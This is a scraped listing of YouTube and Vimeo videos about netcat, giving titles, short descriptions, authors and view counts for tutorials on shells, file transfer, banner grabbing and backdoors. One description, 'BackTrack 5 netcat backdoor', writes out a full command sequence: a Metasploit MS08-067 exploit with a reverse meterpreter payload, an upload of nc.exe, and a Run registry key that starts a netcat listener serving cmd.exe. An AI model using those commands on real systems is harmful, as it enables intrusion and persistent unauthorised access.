10:46
Easy Hacking with Netcat
Darren demonstrates all sorts of fun you can have with Netcat, the "Swiss-army knife for T...
published: 06 May 2009
author: revision3
Easy Hacking with Netcat
Darren demonstrates all sorts of fun you can have with Netcat, the "Swiss-army knife for TCP/IP". Use this handy tool to hack into just about anything (well, almost)
published: 06 May 2009
views: 20882
4:37
How to use NetCat to control a remote system
How to use NetCat to control a remote system without installing any software and using a c...
published: 29 Dec 2009
author: softgens
How to use NetCat to control a remote system
How to use NetCat to control a remote system without installing any software and using a custom TCP-IP port.
published: 29 Dec 2009
author: softgens
views: 25365
9:40
Netcat basic shell use
This is a quick demo of part of the 365 lab work. In here you will see a windows command p...
published: 08 Feb 2010
author: rickerty2
Netcat basic shell use
This is a quick demo of part of the 365 lab work. In here you will see a windows command prompt sent to both another Windows system and to a Linux system.
published: 08 Feb 2010
author: rickerty2
views: 3126
8:23
How I'm watching the Superbowl with netcat, ffmpeg, mplayer, stdin and stdout.
Since I don't have cable at home, I decided to use the "power of the command line" to stre...
published: 05 Feb 2012
author: climagic
How I'm watching the Superbowl with netcat, ffmpeg, mplayer, stdin and stdout.
Since I don't have cable at home, I decided to use the "power of the command line" to stream it from my office, where I have computers with video capture cards setup. Get more tips at: www.climagic.org
published: 05 Feb 2012
author: climagic
views: 2610
4:48
BackTrack 5 netcat backdoor
backtrack5 netcat is a backdoor music : Electric Romeo - Immediate Music cp /pentest/windo...
published: 13 Jun 2011
author: ruo911
BackTrack 5 netcat backdoor
backtrack5 netcat is a backdoor music : Electric Romeo - Immediate Music cp /pentest/windows-binaries/tools/nc.exe /root/Desktop nmap -sS -O 192.168.146.130 msfconsole use exploit/windows/smb/ms08_067_netapi set payload windows/meterpreter/reverse_tcp set lhost 192.168.146.133 set rhost 192.168.146.130 exploit upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\ reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v BACKDOOR -dc:\\WINDOWS\\system32\\nc.exe" -: -d -p 1111 -e cmd.exe" reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run reboot nc 192.168.146.130 1111
published: 13 Jun 2011
author: ruo911
views: 42943
41:49
Hacking with Netcat, Targeted Brute Force Dictionaries, V...
Darren shows off some nifty tricks for Netcat and a targeted brute force attack dictionary...
published: 29 Apr 2009
author: Hak5Darren
Hacking with Netcat, Targeted Brute Force Dictionaries, V...
Darren shows off some nifty tricks for Netcat and a targeted brute force attack dictionary generator. Matt continues his series on Virtualization with redundancy and Shannon pimps the blog with her Wordpress plugin picks. Plus the results of our Monkey Contest, the Code Challenge and this weeks easter egg hunt ;)
published: 29 Apr 2009
author: Hak5Darren
views: 25321
8:21
Netcat without Netcat
We're setting up bind shells to netcat, without using netcat! Darren features three method...
published: 16 Mar 2012
author: Hak5Darren
Netcat without Netcat
We're setting up bind shells to netcat, without using netcat! Darren features three methods to create reverse shell connections to the Internet's favorite TCP/IP swiss army knife.
published: 16 Mar 2012
author: Hak5Darren
views: 9961
5:29
hacking a server with netcat (part 1)
a complete hack using netcat and scanline. visit techknot.com...
published: 31 Dec 2006
author: johnnyineedaspo
hacking a server with netcat (part 1)
a complete hack using netcat and scanline. visit techknot.com
published: 31 Dec 2006
author: johnnyineedaspo
views: 108141
13:25
Hacking With Netcat Basics.mp4
Netcat basics, Use netcat to chat, send files and as a backdoor. Visit my blog and read th...
published: 13 Jan 2011
author: pl4f0rd
Hacking With Netcat Basics.mp4
Netcat basics, Use netcat to chat, send files and as a backdoor. Visit my blog and read the theory that accompanies this video pl4f0rd.blogspot.com Download netcat for Windows here joncraton.org
published: 13 Jan 2011
author: pl4f0rd
views: 4331
4:37
BASH - netcat lesson #1
The first netcat lesson - how to connect www.bashscripts.info...
published: 03 Sep 2009
author: metalx1000
BASH - netcat lesson #1
The first netcat lesson - how to connect www.bashscripts.info
published: 03 Sep 2009
author: metalx1000
views: 4679
4:49
NetCat goodie tutorial
mountolympus.myvnc.com - Head on over to our website for more Videos, Articles and other c...
published: 27 Sep 2009
author: Zeus Jupiter
NetCat goodie tutorial
mountolympus.myvnc.com - Head on over to our website for more Videos, Articles and other content. Join the crew for more benefits. Learn this netcat lesson it is cool, and thorough.
published: 27 Sep 2009
author: Zeus Jupiter
views: 2340
15:48
Uso de Netcat en Linux / Windows (Parte I)
En este segundo tutorial de seguridad os dejo 3 de los posibles usos de Netcat en Linux (a...
published: 18 Jan 2011
author: Mimi Mars
Uso de Netcat en Linux / Windows (Parte I)
En este segundo tutorial de seguridad os dejo 3 de los posibles usos de Netcat en Linux (ataca) y Windows (atacante/oyente)....mas informacion en cursoredlocal.wordpress.com
published: 18 Jan 2011
author: Mimi Mars
views: 3833
6:23
Netcat HowTo Banner Grabbing, Bind Shell, Reverse Shell and Webserver
Netcat HowTo Banner Grabbing, Bind Shell, Reverse Shell and Webserver Netcat is a computer...
published: 27 Jan 2012
author: MaurisTechChannel
Netcat HowTo Banner Grabbing, Bind Shell, Reverse Shell and Webserver
Netcat HowTo Banner Grabbing, Bind Shell, Reverse Shell and Webserver Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities. Netcat is often referred to as a "Swiss-army knife for TCP/IP." Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor. Some of netcat's major features are:[2] Outbound or inbound connections, TCP or UDP, to or from any ports Full DNS forward/reverse checking, with appropriate warnings Ability to use any local source port Ability to use any locally-configured network source address Built-in port-scanning capabilities, with randomization Built-in loose source-routing capability Can read command line arguments from standard input Slow-send mode, one line every N seconds Hex dump of transmitted and received data Optional ability to let another program service established connections Optional telnet-options responder Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host ...
published: 27 Jan 2012
author: MaurisTechChannel
views: 10512
4:08
Banner Grabbing With Netcat
In a previous lesson created, we started using Netcat for the first time. In that video we...
published: 02 Apr 2011
author: Zeus Jupiter
Banner Grabbing With Netcat
In a previous lesson created, we started using Netcat for the first time. In that video we have used it as port scanner. Now in this video we will make netcat grab the banners for us. Send your questions /or Comments to: feedback@sigmaring.tk While at it, Visit the site sigmaring.tk check out all the earlier episodes and other amazing post provided. If you want, you can hang out with me at the IRC along with other visitors and viewers, also. You may also Join my friends list on Facebook, follow me on twitter, subscribe to my youtube channel } ::Stomping Grounds:: Website: sigmaring.tk Facebook www.facebook.com Twitter: twitter.com
published: 02 Apr 2011
author: Zeus Jupiter
views: 569
Vimeo results:
7:03
Basic Netcat Usage
Basic Netcat Usage
To find out more about hacking and computer security check out SANS Ha...
published: 20 Aug 2008
author: John Strand
Basic Netcat Usage
Basic Netcat Usage
To find out more about hacking and computer security check out SANS Hacker techniques and Incident Response and SANS Network Penetration Testing at:
sans.org/info/30768
Also, you can get 10% off using the discount code COINS-JS
Also, check out my site at john-strand.com
3:21
Using Metasploit to Control Netcat
Metasploit has A LOT of exploits, but from time to time you will very likely need to use e...
published: 22 Apr 2010
author: PaulDotCom
Using Metasploit to Control Netcat
Metasploit has A LOT of exploits, but from time to time you will very likely need to use exploits that are not part of the framework. Whether its a exploit from www.exploit-db.com that spawns a shell or a netcat listener you can still use the framework to control the host. In this video we will look at how you can control your netcat listeners and even upgrade them to Meterpreter sessions.
NOTE: I misspoke in the voice over. The shell on 100.3 is upgraded to a meterpreter session, not 100.6.
0:12
Wave Eldar, wave!
AE in progress......
published: 27 Jul 2010
author: netcat
Wave Eldar, wave!
AE in progress...
Youtube results:
4:24
netcat file transfer
This is a part of the 365 lab work. In this demo you will see how you can pipe data into n...
published: 08 Feb 2010
author: rickerty2
netcat file transfer
This is a part of the 365 lab work. In this demo you will see how you can pipe data into netcat and then extract the data another location. this is can be used for moving files though most types of firewall.
published: 08 Feb 2010
author: rickerty2
views: 877
7:45
Blueberry NetCat M-01 Internet tablet
The Blueberry Net Cat is a computer tablet that runs on Android 2.1 operating system. It c...
published: 27 Dec 2010
author: pierres021
Blueberry NetCat M-01 Internet tablet
The Blueberry Net Cat is a computer tablet that runs on Android 2.1 operating system. It comes wit 7-inch wide touch screen with a resolution of 1280 x 720 pixels to provide a fantastic multimedia and internet experience. Great for browsing the net, reading pdf, office files, Ebooks, Movies, Music and Games.
published: 27 Dec 2010
author: pierres021
views: 13165
40:04
Network Tap Analyzers, Streaming Music with Netcat and Wi...
Mubix of Room362 comes down to the HakHouse to share his favorite tools for analyzing pack...
published: 20 May 2009
author: Hak5Darren
Network Tap Analyzers, Streaming Music with Netcat and Wi...
Mubix of Room362 comes down to the HakHouse to share his favorite tools for analyzing packet captures and network taps. Darren's toying around with netcat and music streaming while Shannon's got the skinny on the latest hacks for Wii Homebrew with system menu 4.0.
published: 20 May 2009
author: Hak5Darren
views: 3686
5:08
Using NetCat as a backdoor
...
published: 23 Apr 2009
author: xxlaffingmanxx
Using NetCat as a backdoor